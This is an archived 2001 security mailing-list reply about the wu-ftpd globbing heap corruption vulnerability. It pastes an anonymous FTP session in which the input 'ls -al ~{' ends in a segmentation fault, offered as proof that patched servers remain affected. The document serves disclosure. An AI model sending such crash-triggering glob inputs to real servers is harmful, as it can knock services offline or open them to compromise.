Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

• Previous message: Cabezon Aurélien: "Phpnuke Cross site scripting vulnerability"
• Next in thread: Morten Poulsen: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
• Reply: Morten Poulsen: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:

> Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
> 


[teste@XXX teste]$ ftp test.somehost.com
Connected to test.somehost.com.
220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (test:teste): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-The response 'baubau' is not valid
230-Next time please use your e-mail address as your password
230-        for example: joeat_private
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (194,105,27,22,166,166)
550 Missing }
ftp> ls -al ~{
Segmentation fault (core dumped)

	As you can see the problem still exist, even if updates are done.







Goba

• Next message: Rapid 7 Security Advisories: "OpenBSD local DoS"
• Previous message: Cabezon Aurélien: "Phpnuke Cross site scripting vulnerability"
• Next in thread: Morten Poulsen: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
• Reply: Morten Poulsen: "Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 21:01:11 PST